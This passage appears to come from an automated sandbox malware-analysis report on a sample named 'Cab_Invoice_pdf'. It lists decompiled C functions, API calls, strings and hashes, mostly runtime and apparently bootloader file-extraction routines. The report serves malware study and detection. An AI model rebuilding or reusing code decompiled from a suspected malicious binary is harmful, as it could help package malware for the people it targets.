                            						_t9 =  *0x133c238; // 0x6
                            						_t45 = _t9 - 0xffffffff;
                            						if(_t9 == 0xffffffff) {
                            							L12:
                            							_t32 = E01320B10(_t25, 1, 0x364);
                            							_pop(_t27);
                            							if(_t32 != 0) {
                            								_t11 = E01323862(_t27, __eflags,  *0x133c238, _t32);
                            								__eflags = _t11;
                            								if(_t11 != 0) {
                            									E01324297(_t27, _t32, 0x13463f0);
                            									E013209EB(_t21);
                            									__eflags = _t32;
                            									if(_t32 != 0) {
                            										goto L19;
                            									} else {
                            										goto L18;
                            									}
                            								} else {
                            									_push(_t32);
                            									goto L14;
                            								}
                            							} else {
                            								_push(_t21);
                            								L14:
                            								E013209EB();
                            								L18:
                            								SetLastError(_t37);
                            							}
                            						} else {
                            							_t32 = E0132380C(_t25, _t45, _t9);
                            							if(_t32 != 0) {
                            								L19:
                            								SetLastError(_t37);
                            								_t21 = _t32;
                            							} else {
                            								goto L12;
                            							}
                            						}
                            						return _t21;
                            					}
                            				} else {
                            					_t31 = E0132380C(_t23, _t42, _t2);
                            					if(_t31 != 0) {
                            						L8:
                            						SetLastError(_t36);
                            						return _t31;
                            					} else {
                            						goto L2;
                            					}
                            				}
                            			}

                            APIs
                            • GetLastError.KERNEL32(?,00000000,0131AFEC,00000000,?,?,0131A8EB,?,?,00000000), ref: 01324429
                            • _free.LIBCMT ref: 0132445C
                            • _free.LIBCMT ref: 01324484
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 01324491
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 0132449D
                            • _abort.LIBCMT ref: 013244A3
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorLast$_free$_abort
                            • String ID:
                            • API String ID: 3160817290-0
                            • Opcode ID: 4c323bf164964730ba87560c9c0585fabda6a6246cda977f230f51871d9e930f
                            • Instruction ID: 48c04078b80047f953cfef0d1a04ca6adfce44a717642b6d56829de36ea83445
                            • Opcode Fuzzy Hash: 4c323bf164964730ba87560c9c0585fabda6a6246cda977f230f51871d9e930f
                            • Instruction Fuzzy Hash: 88F04632204B3277D62A327D6C08F2F2A7E9FC1B3CF200115F918F6195EF60C8068265
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E01311320(void* __ecx, void* __edx, void* __eflags) {
                            				void* __ebx;
                            				void* __edi;
                            				void* __ebp;
                            				void* _t7;
                            				signed int _t9;
                            				signed int _t15;
                            				signed int _t17;
                            				void* _t19;
                            				intOrPtr _t27;
                            				signed int _t28;
                            				intOrPtr _t29;
                            				signed int _t30;
                            				void* _t31;
                            
                            				_t21 = __edx;
                            				_t20 = __ecx;
                            				_t29 =  *((intOrPtr*)(_t31 + 0x10));
                            				_t27 =  *((intOrPtr*)(_t31 + 0x10));
                            				_push(_t29);
                            				_push(_t27);
                            				_t19 = E01311220(__ecx, __edx);
                            				_t7 = E01313C20(__edx, _t27);
                            				if(_t7 != 0xffffffff) {
                            					_t3 = _t29 + 0x12; // 0x12
                            					_t23 = _t3;
                            					_t4 = _t27 + 0x2068; // 0x2068
                            					_push(_t3);
                            					_t9 = E01313EF0(_t19, _t3, __eflags);
                            					_t28 = _t9;
                            					_push( *((intOrPtr*)(_t29 + 0xc)));
                            					L01317864();
                            					_t30 = _t9;
                            					__eflags = _t28;
                            					if(__eflags != 0) {
                            						__eflags = E0131A6CB(_t20, _t19, _t30, 1, _t28) - 1;
                            						if(__eflags == 0) {
                            							L7:
                            							_push(_t28);
                            							E01319889(_t20, _t21, __eflags);
                            							L01319803(_t19);
                            							__eflags = 0;
                            							return 0;
                            						} else {
                            							__eflags = _t30;
                            							if(__eflags == 0) {
                            								goto L7;
                            							} else {
                            								_t15 = E013117B0(__eflags, "fwrite", "Failed to write all bytes for %s\n", _t23) | 0xffffffff;
                            								__eflags = _t15;
                            								return _t15;
                            							}
                            						}
                            					} else {
                            						_t17 = E013117B0(__eflags, "fopen", "%s could not be extracted!\n", _t23) | 0xffffffff;
                            						__eflags = _t17;
                            						return _t17;
                            					}
                            				} else {
                            					return _t7;
                            				}
                            			}

















                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: htonl
                            • String ID: %s could not be extracted!$Failed to write all bytes for %s$fopen$fwrite
                            • API String ID: 2009864989-741305175
                            • Opcode ID: 6640b1b5512350ff2f6fbfbe94cdf41bf19cc89d0f58d0e14d95f84fea24a444
                            • Instruction ID: 94b33d94137b5d2a63d3e381a4a4eca97b48a03033c3dc71815f33641ac37000
                            • Opcode Fuzzy Hash: 6640b1b5512350ff2f6fbfbe94cdf41bf19cc89d0f58d0e14d95f84fea24a444
                            • Instruction Fuzzy Hash: E5110473A4131923CA2831BE7C45CEB375DCED267EB040B76FA20D2649FA52951442B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 82%
                            			E0131FDDF(signed int __eax, void* __ecx) {
                            				signed int _t2;
                            				signed int _t3;
                            				int _t10;
                            				int _t11;
                            				void* _t13;
                            				char** _t16;
                            				short* _t19;
                            				void* _t20;
                            
                            				_t13 = __ecx;
                            				_t16 =  *0x13460bc; // 0xe55920
                            				if(_t16 != 0) {
                            					_t10 = 0;
                            					while( *_t16 != _t10) {
                            						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
                            						_t11 = _t2;
                            						if(_t11 == 0) {
                            							L11:
                            							_t3 = _t2 | 0xffffffff;
                            						} else {
                            							_t19 = E01320B10(_t13, _t11, 2);
                            							_pop(_t13);
                            							if(_t19 == 0) {
                            								L10:
                            								_t2 = E013209EB(_t19);
                            								goto L11;
                            							} else {
                            								_t10 = 0;
                            								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
                            									goto L10;
                            								} else {
                            									_push(0);
                            									_push(_t19);
                            									E0132688D(_t13);
                            									E013209EB(0);
                            									_t20 = _t20 + 0xc;
                            									_t16 =  &(_t16[1]);
                            									continue;
                            								}
                            							}
                            						}
                            						L9:
                            						return _t3;
                            						goto L12;
                            					}
                            					_t3 = 0;
                            					goto L9;
                            				} else {
                            					return __eax | 0xffffffff;
                            				}
                            				L12:
                            			}












                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID: Y
                            • API String ID: 0-3319100138
                            • Opcode ID: b437245bfc9ce7ada0d73ea2f65766c1bb956a24775b91e7bc5d2b89ca697402
                            • Instruction ID: 6dea6ab17226b7dec6e8d329d7886201be7d06ebaf11757e0bf61ded4461cdcb
                            • Opcode Fuzzy Hash: b437245bfc9ce7ada0d73ea2f65766c1bb956a24775b91e7bc5d2b89ca697402
                            • Instruction Fuzzy Hash: 4901D1B2209A2A7EF629297C6CC0D6B6A5DEF41BBCB200329F535921DADB608C084170
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 72%
                            			E01314B30(char _a4, intOrPtr _a8, char _a12, void* _a8188, signed int _a8204, WCHAR* _a8212) {
                            				intOrPtr _v0;
                            				struct _SECURITY_ATTRIBUTES _v16;
                            				signed int _t12;
                            				signed int _t19;
                            				signed int _t21;
                            				WCHAR* _t33;
                            				void* _t37;
                            				signed int _t40;
                            
                            				E01317880();
                            				_t12 =  *0x133c008; // 0xa212446c
                            				_a8204 = _t12 ^ _t40;
                            				_t33 = _a8212;
                            				_t37 = E01314920();
                            				_t27 =  !=  ? _t37 : L"S-1-3-4";
                            				E013149D0( &_a12, 0x1000, L"D:(A;;FA;;;%s)",  !=  ? _t37 : L"S-1-3-4");
                            				LocalFree(_t37);
                            				_push(0);
                            				_v0 = 0xc;
                            				_push( &_a4);
                            				_push(1);
                            				_t19 =  &_a12;
                            				_a8 = 0;
                            				_push(_t19);
                            				L0131785E();
                            				if(_t19 != 0) {
                            					_t21 = CreateDirectoryW(_t33,  &_v16);
                            					asm("sbb eax, eax");
                            					E0131786A();
                            					return  ~( ~_t21) - 1;
                            				} else {
                            					E0131786A();
                            					return _t19 | 0xffffffff;
                            				}
                            			}












                            APIs
                              • Part of subcall function 01314920: GetCurrentProcess.KERNEL32(00000008,?), ref: 01314941
                              • Part of subcall function 01314920: OpenProcessToken.ADVAPI32(00000000), ref: 01314948
                              • Part of subcall function 01314920: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 0131495F
                              • Part of subcall function 01314920: GetLastError.KERNEL32 ref: 01314969
                              • Part of subcall function 01314920: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 01314998
                              • Part of subcall function 01314920: ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 013149A9
                              • Part of subcall function 01314920: CloseHandle.KERNEL32(?,00000000,?,?,00000000,0131210F,?,?,00000000,?,00000000), ref: 013149C2
                            • LocalFree.KERNEL32(00000000,01313D37,00000000,?,?,00000000,0131210F,?,?,00000000,?,00000000), ref: 01314B7B
                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,?,?,00000001), ref: 01314B9F
                            • CreateDirectoryW.KERNEL32(?,?,?), ref: 01314BC8
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                            • String ID: D:(A;;FA;;;%s)$S-1-3-4
                            • API String ID: 4998090-2855260032
                            • Opcode ID: 5f927203c77b41aebd140f7094d90218cf432c3ea1ff9e2b93a944efb0f9ac29
                            • Instruction ID: d31da858ae76d3a8675c1b08c6ea0583cebb53ffa34459a206c86423f75a16da
                            • Opcode Fuzzy Hash: 5f927203c77b41aebd140f7094d90218cf432c3ea1ff9e2b93a944efb0f9ac29
                            • Instruction Fuzzy Hash: 0211A9716043019BE628EB29DC49BAB77D9EF84714F404A1EF845C62C5D6349904CB93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyErr_SetString.PYTHON38(6E79EDB4,name too long), ref: 6E2F412C
                            • PyErr_Format.PYTHON38(6E79EDB4,undefined character name '%s'), ref: 6E2F415C
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Err_$FormatString
                            • String ID: name too long$undefined character name '%s'
                            • API String ID: 4212644371-4056717002
                            • Opcode ID: 3cd91e613fba1d85d694574b5d5bf6d9d76ad47f1a21b2917e2ceb4fc1ac1433
                            • Instruction ID: 90842696a6db3e267b9b97d987393696a2c219006eab18bdcada0a1d2a25887d
                            • Opcode Fuzzy Hash: 3cd91e613fba1d85d694574b5d5bf6d9d76ad47f1a21b2917e2ceb4fc1ac1433
                            • Instruction Fuzzy Hash: 8B018431190118EFDB009FD8EC88DD67BAEEB4636AF044065F50DCA201D772D566CBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0131D000(void* __ebx, void* __edi, intOrPtr _a4) {
                            				void* __esi;
                            				void* _t4;
                            
                            				_t21 = __edi;
                            				_t10 = __ebx;
                            				if(_a4 != 0) {
                            					_t23 = E0132F355(_a4, 0x2e);
                            					if(_t3 == 0 || E013251D5(__ebx, __edi, _t23, _t23, L".exe") != 0 && E013251D5(__ebx, __edi, _t23, _t23, L".cmd") != 0 && E013251D5(_t10, _t21, _t23, _t23, L".bat") != 0 && E013251D5(_t10, _t21, _t23, _t23, L".com") != 0) {
                            						_t4 = 0;
                            					} else {
                            						_t4 = 1;
                            					}
                            					return _t4;
                            				} else {
                            					return 0;
                            				}
                            			}






                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _wcsrchr
                            • String ID: .bat$.cmd$.com$.exe
                            • API String ID: 1752292252-4019086052
                            • Opcode ID: c6e8f711095726d4300f1bc4e9e50b4633e67291ead793769a7cc265e9e4f9e8
                            • Instruction ID: 2395bf84c06812b81f25b4b10ef1fc1c242fbb716d3831d5d651da67ddf11104
                            • Opcode Fuzzy Hash: c6e8f711095726d4300f1bc4e9e50b4633e67291ead793769a7cc265e9e4f9e8
                            • Instruction Fuzzy Hash: 58F0BB3354A72735FD2D359E6C06ADB1B9C4F935FDB34001AFA0456AC4DE51E58350AC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            			E013201DD(void* __ecx, intOrPtr _a4) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed int _t10;
                            				int _t12;
                            				int _t19;
                            				signed int _t21;
                            
                            				_t10 =  *0x133c008; // 0xa212446c
                            				_v8 = _t10 ^ _t21;
                            				_v12 = _v12 & 0x00000000;
                            				_t12 =  &_v12;
                            				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                            				if(_t12 != 0) {
                            					_t12 = GetProcAddress(_v12, "CorExitProcess");
                            					_t19 = _t12;
                            					if(_t19 != 0) {
                            						 *0x133019c(_a4);
                            						_t12 =  *_t19();
                            					}
                            				}
                            				if(_v12 != 0) {
                            					_t12 = FreeLibrary(_v12);
                            				}
                            				E0131786A();
                            				return _t12;
                            			}










                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0132018E,?,?,0132012E,?,0133A6E0,0000000C,01320285,?,00000002), ref: 013201FD
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01320210
                            • FreeLibrary.KERNEL32(00000000,?,?,?,0132018E,?,?,0132012E,?,0133A6E0,0000000C,01320285,?,00000002,00000000), ref: 01320233
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: 9c5471be0490e04f043c39f69399195db0c7d4f3522b7c0b8a60e68e77a55b23
                            • Instruction ID: df960972871a1bb0b8f81588e731659e347d87df2ae383f1bc2075812b6b3f83
                            • Opcode Fuzzy Hash: 9c5471be0490e04f043c39f69399195db0c7d4f3522b7c0b8a60e68e77a55b23
                            • Instruction Fuzzy Hash: F8F06235A1021CBFDB299F95DC09B9DBFBCEF49716F000169F909A2240DB349A44CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E013205E4(signed int* __ecx, signed int __edx) {
                            				signed int _v8;
                            				intOrPtr* _v12;
                            				signed int _v16;
                            				signed int _t28;
                            				signed int _t29;
                            				intOrPtr _t33;
                            				signed int _t37;
                            				signed int _t38;
                            				signed int _t40;
                            				void* _t50;
                            				signed int _t56;
                            				intOrPtr* _t57;
                            				signed int _t68;
                            				signed int _t71;
                            				signed int _t72;
                            				signed int _t74;
                            				signed int _t75;
                            				signed int _t78;
                            				signed int _t80;
                            				signed int* _t81;
                            				signed int _t85;
                            				void* _t86;
                            
                            				_t72 = __edx;
                            				_v12 = __ecx;
                            				_t28 =  *__ecx;
                            				_t81 =  *_t28;
                            				if(_t81 != 0) {
                            					_t29 =  *0x133c008; // 0xa212446c
                            					_t56 =  *_t81 ^ _t29;
                            					_t78 = _t81[1] ^ _t29;
                            					_t83 = _t81[2] ^ _t29;
                            					asm("ror edi, cl");
                            					asm("ror esi, cl");
                            					asm("ror ebx, cl");
                            					if(_t78 != _t83) {
                            						L14:
                            						 *_t78 = E0131F6AC( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                            						_t33 = E01319353(_t56);
                            						_t57 = _v12;
                            						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                            						_t24 = _t78 + 4; // 0x4
                            						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E01319353(_t24);
                            						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E01319353(_t83);
                            						_t37 = 0;
                            						L15:
                            						return _t37;
                            					}
                            					_t38 = 0x200;
                            					_t85 = _t83 - _t56 >> 2;
                            					if(_t85 <= 0x200) {
                            						_t38 = _t85;
                            					}
                            					_t80 = _t38 + _t85;
                            					if(_t80 == 0) {
                            						_t80 = 0x20;
                            					}
                            					if(_t80 < _t85) {
                            						L9:
                            						_push(4);
                            						_t80 = _t85 + 4;
                            						_push(_t80);
                            						_v8 = E0132850F(_t56);
                            						_t40 = E013209EB(0);
                            						_t68 = _v8;
                            						_t86 = _t86 + 0x10;
                            						if(_t68 != 0) {
                            							goto L11;
                            						}
                            						_t37 = _t40 | 0xffffffff;
                            						goto L15;
                            					} else {
                            						_push(4);
                            						_push(_t80);
                            						_v8 = E0132850F(_t56);
                            						E013209EB(0);
                            						_t68 = _v8;
                            						_t86 = _t86 + 0x10;
                            						if(_t68 != 0) {
                            							L11:
                            							_t56 = _t68;
                            							_v8 = _t68 + _t85 * 4;
                            							_t83 = _t68 + _t80 * 4;
                            							_t78 = _v8;
                            							_push(0x20);
                            							asm("ror eax, cl");
                            							_t71 = _t78;
                            							_v16 = 0 ^  *0x133c008;
                            							asm("sbb edx, edx");
                            							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                            							_v8 = _t74;
                            							if(_t74 == 0) {
                            								goto L14;
                            							}
                            							_t75 = _v16;
                            							_t50 = 0;
                            							do {
                            								_t50 = _t50 + 1;
                            								 *_t71 = _t75;
                            								_t71 = _t71 + 4;
                            							} while (_t50 != _v8);
                            							goto L14;
                            						}
                            						goto L9;
                            					}
                            				}
                            				return _t28 | 0xffffffff;
                            			}


























                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: f9efa9c568e0291ca45ce453f4b786e7274141653b7e36f57ab8efdfa8cd2e26
                            • Instruction ID: 6ade030b4dd62635b40d77d7f612ad806c8e9e11078fe5e7ac706b52b2b1f7ee
                            • Opcode Fuzzy Hash: f9efa9c568e0291ca45ce453f4b786e7274141653b7e36f57ab8efdfa8cd2e26
                            • Instruction Fuzzy Hash: E2410832A002249FDB28EF7CC880A5EB7F5EF89328F254599E555EB385D731E905CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E0131E132(void* __ecx, short* _a4, short* _a8) {
                            				int _t7;
                            				char* _t13;
                            				signed int _t14;
                            				char* _t15;
                            				int _t19;
                            				intOrPtr* _t20;
                            				short* _t21;
                            				void* _t22;
                            				void* _t25;
                            				int _t29;
                            				int _t33;
                            				intOrPtr _t35;
                            				char* _t36;
                            
                            				_t25 = __ecx;
                            				_t7 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, 0, 0, 0, 0);
                            				_t21 = _a8;
                            				_t33 = _t7;
                            				_t35 = 0x2a;
                            				if(_t33 != 0) {
                            					if(_t21 != 0) {
                            						_t19 = WideCharToMultiByte(0, 0, _t21, 0xffffffff, 0, 0, 0, 0);
                            						if(_t19 == 0) {
                            							goto L1;
                            						} else {
                            							_t33 = _t33 + _t19;
                            						}
                            					}
                            				} else {
                            					L1:
                            					_t20 = E0131C9CE();
                            					_t33 = 0;
                            					 *_t20 = _t35;
                            				}
                            				_t36 = E01320B10(_t25, _t33, 1);
                            				if(_t36 == 0) {
                            					L8:
                            					_t22 = 0;
                            				} else {
                            					_t29 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, _t36, _t33, 0, 0);
                            					if(_t29 != 0) {
                            						if(_t21 == 0) {
                            							L12:
                            							_t13 = _t36;
                            							_t36 = 0;
                            							_push(0);
                            							_push(_t13);
                            							_t14 = E01326882(0);
                            							asm("sbb bl, bl");
                            							_t22 =  ~_t14 + 1;
                            						} else {
                            							_t15 = _t29 + _t36;
                            							 *((char*)(_t15 - 1)) = 0x3d;
                            							if(WideCharToMultiByte(0, 0, _t21, 0xffffffff, _t15, _t33 - _t29, 0, 0) == 0) {
                            								goto L7;
                            							} else {
                            								goto L12;
                            							}
                            						}
                            					} else {
                            						L7:
                            						 *((intOrPtr*)(E0131C9CE())) = 0x2a;
                            						goto L8;
                            					}
                            				}
                            				E013209EB(_t36);
                            				return _t22;
                            			}

















                            APIs
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,0131DFF2,?,?), ref: 0131E147
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,0131DFF2,?,?), ref: 0131E173
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,0131DFF2,?,?), ref: 0131E19C
                            • _free.LIBCMT ref: 0131E1B6
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,0131DFF2,?,?), ref: 0131E1DB
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$_free
                            • String ID:
                            • API String ID: 4292660327-0
                            • Opcode ID: 5231d1f99b7a728d0a99132b1d4e96ab9a2d523d26edb8bebf24f509a79612d2
                            • Instruction ID: abd3a894079bf9fc1e1a306f17984d7469b662d96d7c71592780906825045d3b
                            • Opcode Fuzzy Hash: 5231d1f99b7a728d0a99132b1d4e96ab9a2d523d26edb8bebf24f509a79612d2
                            • Instruction Fuzzy Hash: 8521A8B26493257EFB2A19799C48DBB6A9DDB86B78B140239FD15C71C4DD718C008670
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 81%
                            			E6E2F437C(void* __ebx, void* __ecx, void* __edx, void* __edi) {
                            				void* _t43;
                            				char _t44;
                            				signed int _t48;
                            				signed int _t54;
                            				signed int _t59;
                            				signed char _t67;
                            				signed int _t69;
                            				void* _t79;
                            				signed int _t84;
                            				void* _t87;
                            				void* _t88;
                            				void* _t100;
                            				void* _t103;
                            				signed int _t108;
                            				void* _t111;
                            				signed int _t113;
                            				signed int _t117;
                            				intOrPtr* _t119;
                            				void* _t121;
                            
                            				_t103 = __edx;
                            				_t87 = __ecx;
                            				E6E2F5090(__ebx, __edi, 0x6e3f75e0, 0x10);
                            				_t43 = E6E2F4C25(_t87, 0);
                            				_pop(_t88);
                            				if(_t43 == 0) {
                            					L11:
                            					_t44 = 0;
                            					__eflags = 0;
                            					goto L12;
                            				} else {
                            					 *((char*)(_t121 - 0x1d)) = E6E2F4B2A();
                            					_t83 = 1;
                            					 *((char*)(_t121 - 0x19)) = 1;
                            					 *(_t121 - 4) =  *(_t121 - 4) & 0x00000000;
